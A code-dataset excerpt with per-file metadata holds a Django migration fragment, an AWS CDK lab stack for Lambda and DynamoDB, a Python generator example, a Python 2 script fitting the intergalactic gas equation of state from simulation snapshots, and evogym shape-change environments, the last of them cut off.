field=models.OneToOneField(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='posts2_texto', to='content.TextContent'),
),
migrations.AddField(
model_name='paginahome',
name='posts2_titulo',
field=models.OneToOneField(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='posts2_titulo', to='content.TitleContent'),
),
migrations.AddField(
model_name='paginahome',
name='posts3_imagen',
field=models.OneToOneField(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='posts3_imagen', to='content.ImageContent'),
),
migrations.AddField(
model_name='paginahome',
name='posts3_texto',
field=models.OneToOneField(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='posts3_texto', to='content.TextContent'),
),
migrations.AddField(
model_name='paginahome',
name='posts3_titulo',
field=models.OneToOneField(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='posts3_titulo', to='content.TitleContent'),
),
migrations.AddField(
model_name='paginahome',
name='posts4_imagen',
field=models.OneToOneField(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='posts4_imagen', to='content.ImageContent'),
),
migrations.AddField(
model_name='paginahome',
name='posts4_texto',
field=models.OneToOneField(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='posts4_texto', to='content.TextContent'),
),
migrations.AddField(
model_name='paginahome',
name='posts4_titulo',
field=models.OneToOneField(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='posts4_titulo', to='content.TitleContent'),
),
]
| en | 0.712524 | # -*- coding: utf-8 -*- # Generated by Django 1.10.5 on 2017-01-22 15:45 | 1.649861 | 2 |
1-lab-lambdaDynamoDB/source/cdk/app.py | donnieprakoso/workshop-buildingRESTAPIwithAWS | 23 | 10311 | <reponame>donnieprakoso/workshop-buildingRESTAPIwithAWS
#!/usr/bin/env python3
from aws_cdk import aws_iam as _iam
from aws_cdk import aws_lambda as _lambda
from aws_cdk import aws_dynamodb as _ddb
from aws_cdk import core
class CdkStack(core.Stack):
def __init__(self, scope: core.Construct, id: str, stack_prefix:str, **kwargs) -> None:
super().__init__(scope, id, **kwargs)
# Model all required resources
ddb_table = _ddb.Table(
self,
id='{}-data'.format(stack_prefix),
table_name='{}-data'.format(stack_prefix),
partition_key=_ddb.Attribute(name='ID',
type=_ddb.AttributeType.STRING),
removal_policy=core.RemovalPolicy.DESTROY, # THIS IS NOT RECOMMENDED FOR PRODUCTION USE
read_capacity=1,
write_capacity=1)
## IAM Roles
lambda_role = _iam.Role(
self,
id='{}-lambda-role'.format(stack_prefix),
assumed_by=_iam.ServicePrincipal('lambda.amazonaws.com'))
cw_policy_statement = _iam.PolicyStatement(effect=_iam.Effect.ALLOW)
cw_policy_statement.add_actions("logs:CreateLogGroup")
cw_policy_statement.add_actions("logs:CreateLogStream")
cw_policy_statement.add_actions("logs:PutLogEvents")
cw_policy_statement.add_actions("logs:DescribeLogStreams")
cw_policy_statement.add_resources("*")
lambda_role.add_to_policy(cw_policy_statement)
# Add role for DynamoDB
dynamodb_policy_statement = _iam.PolicyStatement(
effect=_iam.Effect.ALLOW)
dynamodb_policy_statement.add_actions("dynamodb:PutItem")
dynamodb_policy_statement.add_actions("dynamodb:GetItem")
dynamodb_policy_statement.add_actions("dynamodb:Scan")
dynamodb_policy_statement.add_actions("dynamodb:Query")
dynamodb_policy_statement.add_actions("dynamodb:ConditionCheckItem")
dynamodb_policy_statement.add_resources(ddb_table.table_arn)
lambda_role.add_to_policy(dynamodb_policy_statement)
## AWS Lambda Functions
fnLambda_storeData = _lambda.Function(
self,
"{}-function-storeData".format(stack_prefix),
code=_lambda.AssetCode("../lambda-functions/store-data"),
handler="app.handler",
timeout=core.Duration.seconds(60),
role=lambda_role,
runtime=_lambda.Runtime.PYTHON_3_8)
fnLambda_storeData.add_environment("TABLE_NAME", ddb_table.table_name)
fnLambda_listData = _lambda.Function(
self,
"{}-function-getData".format(stack_prefix),
code=_lambda.AssetCode("../lambda-functions/list-data"),
handler="app.handler",
role=lambda_role,
timeout=core.Duration.seconds(60),
runtime=_lambda.Runtime.PYTHON_3_8)
fnLambda_listData.add_environment("TABLE_NAME", ddb_table.table_name)
core.CfnOutput(self, "{}-output-dynamodbTable".format(stack_prefix), value=ddb_table.table_name, export_name="{}-ddbTable".format(stack_prefix))
core.CfnOutput(self, "{}-output-lambdaStoreData".format(stack_prefix), value=fnLambda_storeData.function_name, export_name="{}-lambdaStoreDataName".format(stack_prefix))
core.CfnOutput(self, "{}-output-lambdaListData".format(stack_prefix), value=fnLambda_listData.function_name, export_name="{}-lambdaListDataName".format(stack_prefix))
stack_prefix='restAPI-lab1-lambdaDynamoDB'
app = core.App()
stack = CdkStack(app, stack_prefix, stack_prefix=stack_prefix)
core.Tags.of(stack).add('Name',stack_prefix)
app.synth()
| #!/usr/bin/env python3
from aws_cdk import aws_iam as _iam
from aws_cdk import aws_lambda as _lambda
from aws_cdk import aws_dynamodb as _ddb
from aws_cdk import core
class CdkStack(core.Stack):
def __init__(self, scope: core.Construct, id: str, stack_prefix:str, **kwargs) -> None:
super().__init__(scope, id, **kwargs)
# Model all required resources
ddb_table = _ddb.Table(
self,
id='{}-data'.format(stack_prefix),
table_name='{}-data'.format(stack_prefix),
partition_key=_ddb.Attribute(name='ID',
type=_ddb.AttributeType.STRING),
removal_policy=core.RemovalPolicy.DESTROY, # THIS IS NOT RECOMMENDED FOR PRODUCTION USE
read_capacity=1,
write_capacity=1)
## IAM Roles
lambda_role = _iam.Role(
self,
id='{}-lambda-role'.format(stack_prefix),
assumed_by=_iam.ServicePrincipal('lambda.amazonaws.com'))
cw_policy_statement = _iam.PolicyStatement(effect=_iam.Effect.ALLOW)
cw_policy_statement.add_actions("logs:CreateLogGroup")
cw_policy_statement.add_actions("logs:CreateLogStream")
cw_policy_statement.add_actions("logs:PutLogEvents")
cw_policy_statement.add_actions("logs:DescribeLogStreams")
cw_policy_statement.add_resources("*")
lambda_role.add_to_policy(cw_policy_statement)
# Add role for DynamoDB
dynamodb_policy_statement = _iam.PolicyStatement(
effect=_iam.Effect.ALLOW)
dynamodb_policy_statement.add_actions("dynamodb:PutItem")
dynamodb_policy_statement.add_actions("dynamodb:GetItem")
dynamodb_policy_statement.add_actions("dynamodb:Scan")
dynamodb_policy_statement.add_actions("dynamodb:Query")
dynamodb_policy_statement.add_actions("dynamodb:ConditionCheckItem")
dynamodb_policy_statement.add_resources(ddb_table.table_arn)
lambda_role.add_to_policy(dynamodb_policy_statement)
## AWS Lambda Functions
fnLambda_storeData = _lambda.Function(
self,
"{}-function-storeData".format(stack_prefix),
code=_lambda.AssetCode("../lambda-functions/store-data"),
handler="app.handler",
timeout=core.Duration.seconds(60),
role=lambda_role,
runtime=_lambda.Runtime.PYTHON_3_8)
fnLambda_storeData.add_environment("TABLE_NAME", ddb_table.table_name)
fnLambda_listData = _lambda.Function(
self,
"{}-function-getData".format(stack_prefix),
code=_lambda.AssetCode("../lambda-functions/list-data"),
handler="app.handler",
role=lambda_role,
timeout=core.Duration.seconds(60),
runtime=_lambda.Runtime.PYTHON_3_8)
fnLambda_listData.add_environment("TABLE_NAME", ddb_table.table_name)
core.CfnOutput(self, "{}-output-dynamodbTable".format(stack_prefix), value=ddb_table.table_name, export_name="{}-ddbTable".format(stack_prefix))
core.CfnOutput(self, "{}-output-lambdaStoreData".format(stack_prefix), value=fnLambda_storeData.function_name, export_name="{}-lambdaStoreDataName".format(stack_prefix))
core.CfnOutput(self, "{}-output-lambdaListData".format(stack_prefix), value=fnLambda_listData.function_name, export_name="{}-lambdaListDataName".format(stack_prefix))
stack_prefix='restAPI-lab1-lambdaDynamoDB'
app = core.App()
stack = CdkStack(app, stack_prefix, stack_prefix=stack_prefix)
core.Tags.of(stack).add('Name',stack_prefix)
app.synth() | en | 0.398728 | #!/usr/bin/env python3 # Model all required resources # THIS IS NOT RECOMMENDED FOR PRODUCTION USE ## IAM Roles # Add role for DynamoDB ## AWS Lambda Functions | 2.088131 | 2 |
module_6_lets_make_a_web_app/webapp/yield.py | JCarlos831/python_getting_started_-pluralsight- | 0 | 10312 | <reponame>JCarlos831/python_getting_started_-pluralsight-
students = []
def read_file():
try:
f = open("students.txt", "r")
for student in read_students(f):
students.append(student)
f.close()
except Exception:
print("Could not read file")
def read_students(f):
for line in f:
yield line
read_file()
print(students) | students = []
def read_file():
try:
f = open("students.txt", "r")
for student in read_students(f):
students.append(student)
f.close()
except Exception:
print("Could not read file")
def read_students(f):
for line in f:
yield line
read_file()
print(students) | none | 1 | 3.776384 | 4 |
|
paul_analysis/Python/labird/gamma.py | lzkelley/arepo-mbh-sims_analysis | 0 | 10313 | """Module for finding an effective equation of state for in the Lyman-alpha forest
from a snapshot. Ported to python from <NAME>'s IDL script."""
import h5py
import math
import numpy as np
def read_gamma(num,base):
"""Reads in an HDF5 snapshot from the NE gadget version, fits a power law to the
equation of state for low density, low temperature gas.
Inputs:
num - snapshot number
base - Snapshot directory
Outputs:
(T_0, \gamma) - Effective equation of state parameters
"""
# Baryon density parameter
omegab0 = 0.0449
singlefile=False
#base="/home/spb41/data2/runs/bf2/"
snap=str(num).rjust(3,'0')
fname=base+"/snapdir_"+snap+"/snap_"+snap
try:
f=h5py.File(fname+".0.hdf5",'r')
except IOError:
fname=base+"/snap_"+snap
f=h5py.File(fname+".hdf5",'r')
singlefile=True
print 'Reading file from:',fname
head=f["Header"].attrs
npart=head["NumPart_ThisFile"]
redshift=head["Redshift"]
print "z=",redshift
atime=head["Time"]
h100=head["HubbleParam"]
if npart[0] == 0 :
print "No gas particles!\n"
return
f.close()
# Scaling factors and constants
Xh = 0.76 # Hydrogen fraction
G = 6.672e-11 # N m^2 kg^-2
kB = 1.3806e-23 # J K^-1
Mpc = 3.0856e22 # m
kpc = 3.0856e19 # m
Msun = 1.989e30 # kg
mH = 1.672e-27 # kg
H0 = 1.e5/Mpc # 100 km s^-1 Mpc^-1 in SI units
gamma = 5.0/3.0
rscale = (kpc * atime)/h100 # convert length to m
#vscale = atime**0.5 # convert velocity to km s^-1
mscale = (1e10 * Msun)/h100 # convert mass to kg
dscale = mscale / (rscale**3.0) # convert density to kg m^-3
escale = 1e6 # convert energy/unit mass to J kg^-1
N = 0
sx = 0
sy = 0
sxx = 0
sxy = 0
met = 0
carb = 0
oxy = 0
totmass=0
totigmmass=0
totmet = 0
sxxm = 0
sxym = 0
sxm = 0
sym = 0
for i in np.arange(0,500) :
ffname=fname+"."+str(i)+".hdf5"
if singlefile:
ffname=fname+".hdf5"
if i > 0:
break
#print 'Reading file ',ffname
try:
f=h5py.File(ffname,'r')
except IOError:
break
head=f["Header"].attrs
npart=head["NumPart_ThisFile"]
if npart[0] == 0 :
print "No gas particles in file ",i,"!\n"
break
bar = f["PartType0"]
u=np.array(bar['InternalEnergy'],dtype=np.float64)
rho=np.array(bar['Density'],dtype=np.float64)
nelec=np.array(bar['ElectronAbundance'],dtype=np.float64)
metalic = np.array(bar['GFM_Metallicity'],dtype=np.float64)
metals = np.array(bar['GFM_Metals'],dtype=np.float64)
mass = np.array(bar['Masses'], dtype=np.float64)
#nH0=np.array(bar['NeutralHydrogenAbundance'])
f.close()
# Convert to physical SI units. Only energy and density considered here.
rho *= dscale # kg m^-3, ,physical
u *= escale # J kg^-1
## Mean molecular weight
mu = 1.0 / ((Xh * (0.75 + nelec)) + 0.25)
#temp = mu/kB * (gamma-1) * u * mH
#templog = alog10(temp)
templog=np.log10(mu/kB * (gamma-1) * u * mH)
##### Critical matter/energy density at z=0.0
rhoc = 3 * (H0*h100)**2 / (8. * math.pi * G) # kg m^-3
##### Mean hydrogen density of the Universe
nHc = rhoc /mH * omegab0 *Xh * (1.+redshift)**3.0
##### Physical hydrogen number density
#nH = rho * Xh / mH
### Hydrogen density as a fraction of the mean hydrogen density
overden = np.log10(rho*Xh/mH / nHc)
### Calculates average/median temperature in a given overdensity range#
#overden = rho/(rhoc *omegab)
#ind = where(overden ge -0.01 and overden le 0.01)
#avgT0 = mean(temp(ind))
#medT0 = median(temp(ind))
#loT0 = min(temp(ind))
#hiT0 = max(temp(ind))
#
#avgnH1 = mean(nH0(ind))
#mednH1 = median(nH0(ind))
#lonH1 = min(nH0(ind))
#hinH1 = max(nH0(ind))
#
#print,''
#print,'Temperature (K) at mean cosmic density'
#print,'Average temperature [K,log]:',avgT0,alog10(avgT0)
#print,'Median temperature [K,log]:',medT0,alog10(medT0)
#print,'Maximum temperature [K,log]:',hiT0,alog10(hiT0)
#print,'Minimum temperature [K,log]:',loT0,alog10(loT0)
#
#print
#print,'nH1/nH at mean cosmic density'
#print,'Mean log H1 abundance [nH1/nH,log]:',avgnH1,alog10(avgnH1)
#print,'Median log H1 abundance [nH1/nH,log]:',mednH1,alog10(mednH1)
#print,'Maximum log H1 abundance [nH1/nH,log]:',hinH1,alog10(hinH1)
#print,'Minimum log H1 abundance [nH1/nH,log]:',lonH1,alog10(lonH1)
#print
#
ind2 = np.where((overden > 0) * (overden < 1.5) )
tempfit = templog[ind2]
overdenfit = overden[ind2]
N += np.size(ind2)
#print, "Number of fitting points for equation of state", N
indm = np.where(metals < 1e-10)
metals[indm] = 1e-10
sx += np.sum(overdenfit)
sy += np.sum(tempfit)
sxx += np.sum(overdenfit*overdenfit)
sxy += np.sum(overdenfit*tempfit)
met += np.sum(mass[ind2]*metalic[ind2])
carb += np.sum(mass[ind2]*metals[ind2,2])
oxy += np.sum(mass[ind2]*metals[ind2,4])
totmet += np.sum(mass*metalic)
totmass += np.sum(mass)
totigmmass += np.sum(mass[ind2])
sym += np.sum(np.log10(metals[ind2,2]))
sxym += np.sum(overdenfit*np.log10(metals[ind2,2]))
# log T = log(T_0) + (gamma-1) log(rho/rho_0)
# and use least squares fit.
delta = (N*sxx)-(sx*sx)
a = ((sxx*sy) - (sx*sxy))/delta
b = ((N*sxy) - (sx*sy))/delta
amet = ((sxx*sym) - (sx*sxym))/delta
bmet = ((N*sxym) - (sx*sym))/delta
print num,": gamma", b+1.0," log(T0)", a," T0 (K)", (10.0)**a, "Metallicity: ", met/totigmmass,totmet/totmass, "[C/H,O/H]: ",carb/totigmmass, oxy/totigmmass,"(a_Z, b_Z): ",10**amet, bmet
raise Exception
return (redshift,10.0**a, b+1)
| """Module for finding an effective equation of state for in the Lyman-alpha forest
from a snapshot. Ported to python from <NAME>'s IDL script."""
import h5py
import math
import numpy as np
def read_gamma(num,base):
"""Reads in an HDF5 snapshot from the NE gadget version, fits a power law to the
equation of state for low density, low temperature gas.
Inputs:
num - snapshot number
base - Snapshot directory
Outputs:
(T_0, \gamma) - Effective equation of state parameters
"""
# Baryon density parameter
omegab0 = 0.0449
singlefile=False
#base="/home/spb41/data2/runs/bf2/"
snap=str(num).rjust(3,'0')
fname=base+"/snapdir_"+snap+"/snap_"+snap
try:
f=h5py.File(fname+".0.hdf5",'r')
except IOError:
fname=base+"/snap_"+snap
f=h5py.File(fname+".hdf5",'r')
singlefile=True
print 'Reading file from:',fname
head=f["Header"].attrs
npart=head["NumPart_ThisFile"]
redshift=head["Redshift"]
print "z=",redshift
atime=head["Time"]
h100=head["HubbleParam"]
if npart[0] == 0 :
print "No gas particles!\n"
return
f.close()
# Scaling factors and constants
Xh = 0.76 # Hydrogen fraction
G = 6.672e-11 # N m^2 kg^-2
kB = 1.3806e-23 # J K^-1
Mpc = 3.0856e22 # m
kpc = 3.0856e19 # m
Msun = 1.989e30 # kg
mH = 1.672e-27 # kg
H0 = 1.e5/Mpc # 100 km s^-1 Mpc^-1 in SI units
gamma = 5.0/3.0
rscale = (kpc * atime)/h100 # convert length to m
#vscale = atime**0.5 # convert velocity to km s^-1
mscale = (1e10 * Msun)/h100 # convert mass to kg
dscale = mscale / (rscale**3.0) # convert density to kg m^-3
escale = 1e6 # convert energy/unit mass to J kg^-1
N = 0
sx = 0
sy = 0
sxx = 0
sxy = 0
met = 0
carb = 0
oxy = 0
totmass=0
totigmmass=0
totmet = 0
sxxm = 0
sxym = 0
sxm = 0
sym = 0
for i in np.arange(0,500) :
ffname=fname+"."+str(i)+".hdf5"
if singlefile:
ffname=fname+".hdf5"
if i > 0:
break
#print 'Reading file ',ffname
try:
f=h5py.File(ffname,'r')
except IOError:
break
head=f["Header"].attrs
npart=head["NumPart_ThisFile"]
if npart[0] == 0 :
print "No gas particles in file ",i,"!\n"
break
bar = f["PartType0"]
u=np.array(bar['InternalEnergy'],dtype=np.float64)
rho=np.array(bar['Density'],dtype=np.float64)
nelec=np.array(bar['ElectronAbundance'],dtype=np.float64)
metalic = np.array(bar['GFM_Metallicity'],dtype=np.float64)
metals = np.array(bar['GFM_Metals'],dtype=np.float64)
mass = np.array(bar['Masses'], dtype=np.float64)
#nH0=np.array(bar['NeutralHydrogenAbundance'])
f.close()
# Convert to physical SI units. Only energy and density considered here.
rho *= dscale # kg m^-3, ,physical
u *= escale # J kg^-1
## Mean molecular weight
mu = 1.0 / ((Xh * (0.75 + nelec)) + 0.25)
#temp = mu/kB * (gamma-1) * u * mH
#templog = alog10(temp)
templog=np.log10(mu/kB * (gamma-1) * u * mH)
##### Critical matter/energy density at z=0.0
rhoc = 3 * (H0*h100)**2 / (8. * math.pi * G) # kg m^-3
##### Mean hydrogen density of the Universe
nHc = rhoc /mH * omegab0 *Xh * (1.+redshift)**3.0
##### Physical hydrogen number density
#nH = rho * Xh / mH
### Hydrogen density as a fraction of the mean hydrogen density
overden = np.log10(rho*Xh/mH / nHc)
### Calculates average/median temperature in a given overdensity range#
#overden = rho/(rhoc *omegab)
#ind = where(overden ge -0.01 and overden le 0.01)
#avgT0 = mean(temp(ind))
#medT0 = median(temp(ind))
#loT0 = min(temp(ind))
#hiT0 = max(temp(ind))
#
#avgnH1 = mean(nH0(ind))
#mednH1 = median(nH0(ind))
#lonH1 = min(nH0(ind))
#hinH1 = max(nH0(ind))
#
#print,''
#print,'Temperature (K) at mean cosmic density'
#print,'Average temperature [K,log]:',avgT0,alog10(avgT0)
#print,'Median temperature [K,log]:',medT0,alog10(medT0)
#print,'Maximum temperature [K,log]:',hiT0,alog10(hiT0)
#print,'Minimum temperature [K,log]:',loT0,alog10(loT0)
#
#print
#print,'nH1/nH at mean cosmic density'
#print,'Mean log H1 abundance [nH1/nH,log]:',avgnH1,alog10(avgnH1)
#print,'Median log H1 abundance [nH1/nH,log]:',mednH1,alog10(mednH1)
#print,'Maximum log H1 abundance [nH1/nH,log]:',hinH1,alog10(hinH1)
#print,'Minimum log H1 abundance [nH1/nH,log]:',lonH1,alog10(lonH1)
#print
#
ind2 = np.where((overden > 0) * (overden < 1.5) )
tempfit = templog[ind2]
overdenfit = overden[ind2]
N += np.size(ind2)
#print, "Number of fitting points for equation of state", N
indm = np.where(metals < 1e-10)
metals[indm] = 1e-10
sx += np.sum(overdenfit)
sy += np.sum(tempfit)
sxx += np.sum(overdenfit*overdenfit)
sxy += np.sum(overdenfit*tempfit)
met += np.sum(mass[ind2]*metalic[ind2])
carb += np.sum(mass[ind2]*metals[ind2,2])
oxy += np.sum(mass[ind2]*metals[ind2,4])
totmet += np.sum(mass*metalic)
totmass += np.sum(mass)
totigmmass += np.sum(mass[ind2])
sym += np.sum(np.log10(metals[ind2,2]))
sxym += np.sum(overdenfit*np.log10(metals[ind2,2]))
# log T = log(T_0) + (gamma-1) log(rho/rho_0)
# and use least squares fit.
delta = (N*sxx)-(sx*sx)
a = ((sxx*sy) - (sx*sxy))/delta
b = ((N*sxy) - (sx*sy))/delta
amet = ((sxx*sym) - (sx*sxym))/delta
bmet = ((N*sxym) - (sx*sym))/delta
print num,": gamma", b+1.0," log(T0)", a," T0 (K)", (10.0)**a, "Metallicity: ", met/totigmmass,totmet/totmass, "[C/H,O/H]: ",carb/totigmmass, oxy/totigmmass,"(a_Z, b_Z): ",10**amet, bmet
raise Exception
return (redshift,10.0**a, b+1)
| en | 0.555534 | Module for finding an effective equation of state for in the Lyman-alpha forest from a snapshot. Ported to python from <NAME>'s IDL script. Reads in an HDF5 snapshot from the NE gadget version, fits a power law to the equation of state for low density, low temperature gas. Inputs: num - snapshot number base - Snapshot directory Outputs: (T_0, \gamma) - Effective equation of state parameters # Baryon density parameter #base="/home/spb41/data2/runs/bf2/" # Scaling factors and constants # Hydrogen fraction # N m^2 kg^-2 # J K^-1 # m # m # kg # kg # 100 km s^-1 Mpc^-1 in SI units # convert length to m #vscale = atime**0.5 # convert velocity to km s^-1 # convert mass to kg # convert density to kg m^-3 # convert energy/unit mass to J kg^-1 #print 'Reading file ',ffname #nH0=np.array(bar['NeutralHydrogenAbundance']) # Convert to physical SI units. Only energy and density considered here. # kg m^-3, ,physical # J kg^-1 ## Mean molecular weight #temp = mu/kB * (gamma-1) * u * mH #templog = alog10(temp) ##### Critical matter/energy density at z=0.0 # kg m^-3 ##### Mean hydrogen density of the Universe ##### Physical hydrogen number density #nH = rho * Xh / mH ### Hydrogen density as a fraction of the mean hydrogen density ### Calculates average/median temperature in a given overdensity range# #overden = rho/(rhoc *omegab) #ind = where(overden ge -0.01 and overden le 0.01) #avgT0 = mean(temp(ind)) #medT0 = median(temp(ind)) #loT0 = min(temp(ind)) #hiT0 = max(temp(ind)) # #avgnH1 = mean(nH0(ind)) #mednH1 = median(nH0(ind)) #lonH1 = min(nH0(ind)) #hinH1 = max(nH0(ind)) # #print,'' #print,'Temperature (K) at mean cosmic density' #print,'Average temperature [K,log]:',avgT0,alog10(avgT0) #print,'Median temperature [K,log]:',medT0,alog10(medT0) #print,'Maximum temperature [K,log]:',hiT0,alog10(hiT0) #print,'Minimum temperature [K,log]:',loT0,alog10(loT0) # #print #print,'nH1/nH at mean cosmic density' #print,'Mean log H1 abundance [nH1/nH,log]:',avgnH1,alog10(avgnH1) #print,'Median log H1 abundance [nH1/nH,log]:',mednH1,alog10(mednH1) #print,'Maximum log H1 abundance [nH1/nH,log]:',hinH1,alog10(hinH1) #print,'Minimum log H1 abundance [nH1/nH,log]:',lonH1,alog10(lonH1) #print # #print, "Number of fitting points for equation of state", N # log T = log(T_0) + (gamma-1) log(rho/rho_0) # and use least squares fit. | 2.664358 | 3 |
evogym/envs/change_shape.py | federico-camerota/evogym | 78 | 10314 | <gh_stars>10-100
import gym
from gym import error, spaces
from gym import utils
from gym.utils import seeding
from evogym import *
from evogym.envs import BenchmarkBase
import random
from math import *
import numpy as np
import os
class ShapeBase(BenchmarkBase):
def __init__(self, world):
super().__init__(world)
def reset(self):
super().reset()
# observation
obs = np.concatenate((
self.get_relative_pos_obs("robot"),
))
return obs
### ----------------------------------------------------------------------
# This section of code is modified from the following author
# from https://github.com/RodolfoFerro/ConvexHull
# Author: <NAME>
# Mail: <EMAIL>
# Script: Compute the Convex Hull of a set of points using the Graham Scan
# Function to know if we have a CCW turn
def CCW(self, p1, p2, p3):
if (p3[1]-p1[1])*(p2[0]-p1[0]) >= (p2[1]-p1[1])*(p3[0]-p1[0]):
return True
return False
# Main function:
def jarvis_march(self, S):
n = len(S)
P = [None] * n
l = np.where(S[:,0] == np.min(S[:,0]))
pointOnHull = S[l[0][0]]
i = 0
while True:
P[i] = pointOnHull
endpoint = S[0]
for j in range(1,n):
if (endpoint[0] == pointOnHull[0] and endpoint[1] == pointOnHull[1]) or not self.CCW(S[j],P[i],endpoint):
endpoint = S[j]
i = i + 1
pointOnHull = endpoint
if endpoint[0] == P[0][0] and endpoint[1] == P[0][1]:
break
for i in range(n):
if P[-1] is None:
del P[-1]
return np.array(P)
### ----------------------------------------------------------------------
def convex_poly_area(self, pts_cw):
area = 0
for i in range(len(pts_cw)):
i_1 = i + 1
if i_1 >= len(pts_cw):
i_1 = 0
area += (pts_cw[i,0] * pts_cw[i_1,1] - pts_cw[i_1,0] * pts_cw[i,1])
return 0.5 * area
class MaximizeShape(ShapeBase):
def __init__(self, body, connections=None):
# make world
self.world = EvoWorld.from_json(os.path.join(self.DATA_PATH, 'ShapeChange.json'))
self.world.add_from_array('robot', body, 7, 1, connections=connections)
# init sim
ShapeBase.__init__(self, self.world)
# set action space and observation space
num_actuators = self.get_actuator_indices('robot').size
num_robot_points = self.object_pos_at_time(self.get_time(), "robot").size
self.action_space = spaces.Box(low= 0.6, high=1.6, shape=(num_actuators,), dtype=np.float)
self.observation_space = spaces.Box(low=-100.0, high=100.0, shape=(num_robot_points,), dtype=np.float)
def step(self, action):
# collect pre step information
robot_pos_init = self.object_pos_at_time(self.get_time(), "robot")
# step
done = super().step({'robot': action})
# collect post step information
robot_pos_final = self.object_pos_at_time(self.get_time(), "robot")
# observation
obs = np.concatenate((
self.get_relative_pos_obs("robot"),
))
# compute reward
reward = self.get_reward(robot_pos_init, robot_pos_final)
# error check unstable simulation
if done:
print("SIMULATION UNSTABLE... TERMINATING")
reward -= 3.0
# observation, reward, has simulation met termination conditions, debugging info
return obs, reward, done, {}
def get_reward(self, robot_pos_init, robot_pos_final):
# find convex hull of initial state
convex_hull_init = self.jarvis_march(np.transpose(robot_pos_init))
area_init = self.convex_poly_area(convex_hull_init)
# find convex of final state
convex_hull_final = self.jarvis_march(np.transpose(robot_pos_final))
area_final = self.convex_poly_area(convex_hull_final)
reward = (area_final - area_init) * 10
return reward
class MinimizeShape(ShapeBase):
def __init__(self, body, connections=None):
# make world
self.world = EvoWorld.from_json(os.path.join(self.DATA_PATH, 'ShapeChange.json'))
self.world.add_from_array('robot', body, 7, 1, connections=connections)
# init sim
ShapeBase.__init__(self, self.world)
# set action space and observation space
num_actuators = self.get_actuator_indices('robot').size
num_robot_points = self.object_pos_at_time(self.get_time(), "robot").size
self.action_space = spaces.Box(low= 0.6, high=1.6, shape=(num_actuators,), dtype=np.float)
self.observation_space = spaces.Box(low=-100.0, high=100.0, shape=(num_robot_points,), dtype=np.float)
def step(self, action):
# collect pre step information
robot_pos_init = self.object_pos_at_time(self.get_time(), "robot")
# step
done = super().step({'robot': action})
# collect post step information
robot_pos_final = self.object_pos_at_time(self.get_time(), "robot")
# observation
obs = np.concatenate((
self.get_relative_pos_obs("robot"),
))
# compute reward
reward = self.get_reward(robot_pos_init, robot_pos_final)
# error check unstable simulation
if done:
print("SIMULATION UNSTABLE... TERMINATING")
reward -= 3.0
# observation, reward, has simulation met termination conditions, debugging info
return obs, reward, done, {}
def get_reward(self, robot_pos_init, robot_pos_final):
# find convex hull of initial state
convex_hull_init = self.jarvis_march(np.transpose(robot_pos_init))
area_init = self.convex_poly_area(convex_hull_init)
# find convex of final state
convex_hull_final = self.jarvis_march(np.transpose(robot_pos_final))
area_final = self.convex_poly_area(convex_hull_final)
reward = (area_init - area_final) * 10
return reward
class MaximizeXShape(ShapeBase):
def __init__(self, body, connections=None):
# make world
self.world = EvoWorld.from_json(os.path.join(self.DATA_PATH, 'ShapeChange.json'))
self.world.add_from_array('robot', body, 7, 1, connections=connections)
# init sim
ShapeBase.__init__(self, self.world)
# set action space and observation space
num_actuators = self.get_actuator_indices('robot').size
num_robot_points = self.object_pos_at_time(self.get_time(), "robot").size
self.action_space = spaces.Box(low= 0.6, high=1.6, shape=(num_actuators,), dtype=np.float)
self.observation_space = spaces.Box(low=-100.0, high=100.0, shape=(num_robot_points,), dtype=np.float)
def step(self, action):
# collect pre step information
robot_pos_init = self.object_pos_at_time(self.get_time(), "robot")
# step
done = super().step({'robot': action})
# collect post step information
robot_pos_final = self.object_pos_at_time(self.get_time(), "robot")
# observation
obs = np.concatenate((
self.get_relative_pos_obs("robot"),
))
# compute reward
reward = self.get_reward(robot_pos_init, robot_pos_final)
# error check unstable simulation
if done:
print("SIMULATION UNSTABLE... TERMINATING")
reward -= 3.0
# observation, reward, has simulation met termination conditions, debugging info
return obs, reward, done, {}
def get_reward(self, robot_pos_init, robot_pos_final):
robot_min_pos_init = np.min(robot_pos_init, axis=1)
robot_max_pos_init = np.max(robot_pos_init, axis=1)
robot_min_pos_final = np.min(robot_pos_final, axis=1)
robot_max_pos_final = np.max(robot_pos_final, axis=1)
span_final = (robot_max_pos_final[0] - robot_min_pos_final[0])
span_initial = (robot_max_pos_init[0] - robot_min_pos_init[0])
reward = (span_final - span_initial)
return reward
class MaximizeYShape(ShapeBase):
def __init__(self, body, connections=None):
# make world
self.world = EvoWorld.from_json(os.path.join(self.DATA_PATH, 'ShapeChange.json'))
self.world.add_from_array('robot', body, 7, 1, connections=connections)
# init sim
ShapeBase.__init__(self, self.world)
# set action space and observation space
num_actuators = self.get_actuator_indices('robot').size
num_robot_points = self.object_pos_at_time(self.get_time(), "robot").size
self.action_space = spaces.Box(low= 0.6, high=1.6, shape=(num_actuators,), dtype=np.float)
self.observation_space = spaces.Box(low=-100.0, high=100.0, shape=(num_robot_points,), dtype=np.float)
def step(self, action):
# collect pre step information
robot_pos_init = self.object_pos_at_time(self.get_time(), "robot")
# step
done = super().step({'robot': action})
# collect post step information
robot_pos_final = self.object_pos_at_time(self.get_time(), "robot")
# observation
obs = np.concatenate((
self.get_relative_pos_obs("robot"),
))
# compute reward
reward = self.get_reward(robot_pos_init, robot_pos_final)
# error check unstable simulation
if done:
print("SIMULATION UNSTABLE... TERMINATING")
reward -= 3.0
# observation, reward, has simulation met termination conditions, debugging info
return obs, reward, done, {}
def get_reward(self, robot_pos_init, robot_pos_final):
robot_min_pos_init = np.min(robot_pos_init, axis=1)
robot_max_pos_init = np.max(robot_pos_init, axis=1)
robot_min_pos_final = np.min(robot_pos_final, axis=1)
robot_max_pos_final = np.max(robot_pos_final, axis=1)
span_final = (robot_max_pos_final[1] - robot_min_pos_final[1])
span_initial = (robot_max_pos_init[1] - robot_min_pos_init[1])
reward = (span_final - span_initial)
return reward
| import gym
from gym import error, spaces
from gym import utils
from gym.utils import seeding
from evogym import *
from evogym.envs import BenchmarkBase
import random
from math import *
import numpy as np
import os
class ShapeBase(BenchmarkBase):
